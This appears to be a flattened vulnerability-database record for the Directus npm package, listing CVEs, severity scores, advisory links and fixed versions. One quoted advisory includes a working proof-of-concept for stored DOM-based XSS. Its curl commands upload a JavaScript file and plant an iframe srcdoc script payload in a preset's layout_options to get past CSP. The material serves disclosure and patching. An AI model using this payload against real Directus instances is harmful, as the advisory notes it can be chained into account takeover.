scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/
url https://github.com/directus/directus/releases/tag/v9.23.0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-26492
reference_id CVE-2023-26492
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-26492
5
reference_url https://github.com/advisories/GHSA-j3rg-3rgm-537h
reference_id GHSA-j3rg-3rgm-537h
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j3rg-3rgm-537h
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h
reference_id GHSA-j3rg-3rgm-537h
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/
url https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h
fixed_packages
0
url pkg:npm/directus@9.23.0
purl pkg:npm/directus@9.23.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jmem-8d4q-x7br
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0
1
url pkg:npm/directus@9.23.1
purl pkg:npm/directus@9.23.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-eygf-cb4y-hqd3
5
vulnerability VCID-gjju-tu4e-gqfc
6
vulnerability VCID-hrqc-8err-4fbx
7
vulnerability VCID-jmem-8d4q-x7br
8
vulnerability VCID-kqs7-8txh-jyc8
9
vulnerability VCID-m3wb-sstx-v3d6
10
vulnerability VCID-msb5-197k-a3er
11
vulnerability VCID-wgag-36wa-qyay
12
vulnerability VCID-xc7t-gwaz-ckeu
13
vulnerability VCID-xt9c-32g5-mqes
14
vulnerability VCID-yutw-33sk-5fg3
15
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1
aliases CVE-2023-26492, GHSA-j3rg-3rgm-537h
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-szny-2sbf-v7de
16
url VCID-v4vz-smcx-gygb
vulnerability_id VCID-v4vz-smcx-gygb
summary
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Directus is a real-time API and App dashboard for managing SQL database content. Instances relying on an allow-listed reset URL are vulnerable to an HTML injection attack through the use of query parameters in the reset URL. An attacker could exploit this to email users URLs pointing to the server's domain that may contain malicious code. The problem has been resolved and released under version 9.23.0. People relying on a custom password reset URL should upgrade to 9.23.0 or later, or remove the custom reset URL from the configured allow list. Users are advised to upgrade. Users unable to upgrade may disable the custom reset URL allow list as a workaround.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-27474
reference_id
reference_type
scores
0
value 0.00828
scoring_system epss
scoring_elements 0.74823
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-27474
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/issues/17119
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value 8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/
url https://github.com/directus/directus/issues/17119
3
reference_url https://github.com/directus/directus/pull/17120
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value 8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/
url https://github.com/directus/directus/pull/17120
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-27474
reference_id CVE-2023-27474
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-27474
5
reference_url https://github.com/advisories/GHSA-4hmq-ggrm-qfc6
reference_id GHSA-4hmq-ggrm-qfc6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4hmq-ggrm-qfc6
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6
reference_id GHSA-4hmq-ggrm-qfc6
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value 8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/
url https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6
fixed_packages
0
url pkg:npm/directus@9.23.0
purl pkg:npm/directus@9.23.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jmem-8d4q-x7br
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0
1
url pkg:npm/directus@9.23.1
purl pkg:npm/directus@9.23.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-eygf-cb4y-hqd3
5
vulnerability VCID-gjju-tu4e-gqfc
6
vulnerability VCID-hrqc-8err-4fbx
7
vulnerability VCID-jmem-8d4q-x7br
8
vulnerability VCID-kqs7-8txh-jyc8
9
vulnerability VCID-m3wb-sstx-v3d6
10
vulnerability VCID-msb5-197k-a3er
11
vulnerability VCID-wgag-36wa-qyay
12
vulnerability VCID-xc7t-gwaz-ckeu
13
vulnerability VCID-xt9c-32g5-mqes
14
vulnerability VCID-yutw-33sk-5fg3
15
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1
aliases CVE-2023-27474, GHSA-4hmq-ggrm-qfc6
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v4vz-smcx-gygb
17
url VCID-wgag-36wa-qyay
vulnerability_id VCID-wgag-36wa-qyay
summary
Directus has a DOM-Based cross-site scripting (XSS) via layout_options
### Impact
Directus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover.

### PoC
To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.

1. Upload the following JavaScript file.

Using the upload functionality at `POST /files`. This PoC will show an alert message.

```sh
export TARGET_HOST="http://localhost:8055"
export ATTACKER_EMAIL="malicious@malicious.com"
export ATTACKER_PASSWORD="123456"
root_dir=$(dirname $0)
mkdir "${root_dir}/static"

curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
    -c "${root_dir}/static/attacker_directus_session_token" \
    -H 'Content-Type: application/json' \
    -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

id_url_file=$(echo "alert('Successful DOM-based XSS')" |
  curl -s -k -X 'POST' "${TARGET_HOST}/files" \
    -b "${root_dir}/static/attacker_directus_session_token" \
    -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id")
```

2. Create a preset for a collection and store the preset ID.

Or use a preset already created from GET /presets. The following example uses the directus_users preset.

```sh
attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \
    -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id")

curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \
    -H 'Content-Type: application/json' \
    -b "${root_dir}/static/attacker_directus_session_token" \
    --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"
```

When the user visits the view that uses the directus_users preset, the JavaScript file will be executed.

Notes:

Need to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\"<script src='URL_MALICIOUS_FILE'> </script>\">`.

We can target any collection that uses the vulnerable template structure that renders the layout option section.

In this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.
references
0
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 3.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
1
reference_url https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw
reference_id
reference_type
scores
0
value 3.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw
2
reference_url https://github.com/advisories/GHSA-9qrm-48qf-r2rw
reference_id GHSA-9qrm-48qf-r2rw
reference_type
scores
url https://github.com/advisories/GHSA-9qrm-48qf-r2rw
fixed_packages
0
url pkg:npm/directus@11.3.3
purl pkg:npm/directus@11.3.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.3.3
aliases GHSA-9qrm-48qf-r2rw
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wgag-36wa-qyay
18
url VCID-xt9c-32g5-mqes
vulnerability_id VCID-xt9c-32g5-mqes
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-45596
reference_id
reference_type
scores
0
value 0.00753
scoring_system epss
scoring_elements 0.73508
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-45596
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428
3
reference_url https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459
4
reference_url https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/
url https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b
5
reference_url https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/
url https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-45596
reference_id CVE-2024-45596
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-45596
7
reference_url https://github.com/advisories/GHSA-cff8-x7jv-4fm8
reference_id GHSA-cff8-x7jv-4fm8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cff8-x7jv-4fm8
8
reference_url https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8
reference_id GHSA-cff8-x7jv-4fm8
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/
url https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8
fixed_packages
0
url pkg:npm/directus@10.13.3
purl pkg:npm/directus@10.13.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3
1
url pkg:npm/directus@11.1.0
purl pkg:npm/directus@11.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bjzg-mzjf-cfau
1
vulnerability VCID-m3wb-sstx-v3d6
2
vulnerability VCID-m5ng-dsfx-6qev
3
vulnerability VCID-w1ph-v2n1-nbby
4
vulnerability VCID-wgag-36wa-qyay
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0
aliases CVE-2024-45596, GHSA-cff8-x7jv-4fm8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xt9c-32g5-mqes
19
url VCID-yutw-33sk-5fg3
vulnerability_id VCID-yutw-33sk-5fg3
summary Duplicate Advisory: Improper access control in Directus
references
0
reference_url https://directus.io
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://directus.io
1
reference_url https://fluidattacks.com/advisories/capaldi
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://fluidattacks.com/advisories/capaldi
2
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-6534
reference_id CVE-2024-6534
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-6534
4
reference_url https://github.com/advisories/GHSA-q83v-hq3j-4pq3
reference_id GHSA-q83v-hq3j-4pq3
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-q83v-hq3j-4pq3
fixed_packages
0
url pkg:npm/directus@10.13.1
purl pkg:npm/directus@10.13.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kqs7-8txh-jyc8
1
vulnerability VCID-m3wb-sstx-v3d6
2
vulnerability VCID-m5ng-dsfx-6qev
3
vulnerability VCID-msb5-197k-a3er
4
vulnerability VCID-wgag-36wa-qyay
5
vulnerability VCID-xt9c-32g5-mqes
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.1
aliases GHSA-q83v-hq3j-4pq3
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yutw-33sk-5fg3
20
url VCID-yz34-qwam-wbcn
vulnerability_id VCID-yz34-qwam-wbcn
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-36128
reference_id
reference_type
scores
0
value 0.00353
scoring_system epss
scoring_elements 0.57894
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-36128
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/
url https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-36128
reference_id CVE-2024-36128
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-36128
4
reference_url https://github.com/advisories/GHSA-632p-p495-25m5
reference_id GHSA-632p-p495-25m5
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-632p-p495-25m5
5
reference_url https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5
reference_id GHSA-632p-p495-25m5
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/
url https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5
fixed_packages
0
url pkg:npm/directus@10.11.2
purl pkg:npm/directus@10.11.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kqs7-8txh-jyc8
1
vulnerability VCID-m3wb-sstx-v3d6
2
vulnerability VCID-m5ng-dsfx-6qev
3
vulnerability VCID-msb5-197k-a3er
4
vulnerability VCID-wgag-36wa-qyay
5
vulnerability VCID-xc7t-gwaz-ckeu
6
vulnerability VCID-xt9c-32g5-mqes
7
vulnerability VCID-yutw-33sk-5fg3
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.2
aliases CVE-2024-36128, GHSA-632p-p495-25m5
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yz34-qwam-wbcn
Fixing_vulnerabilities
Risk_score null
Resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.0.0-rc.64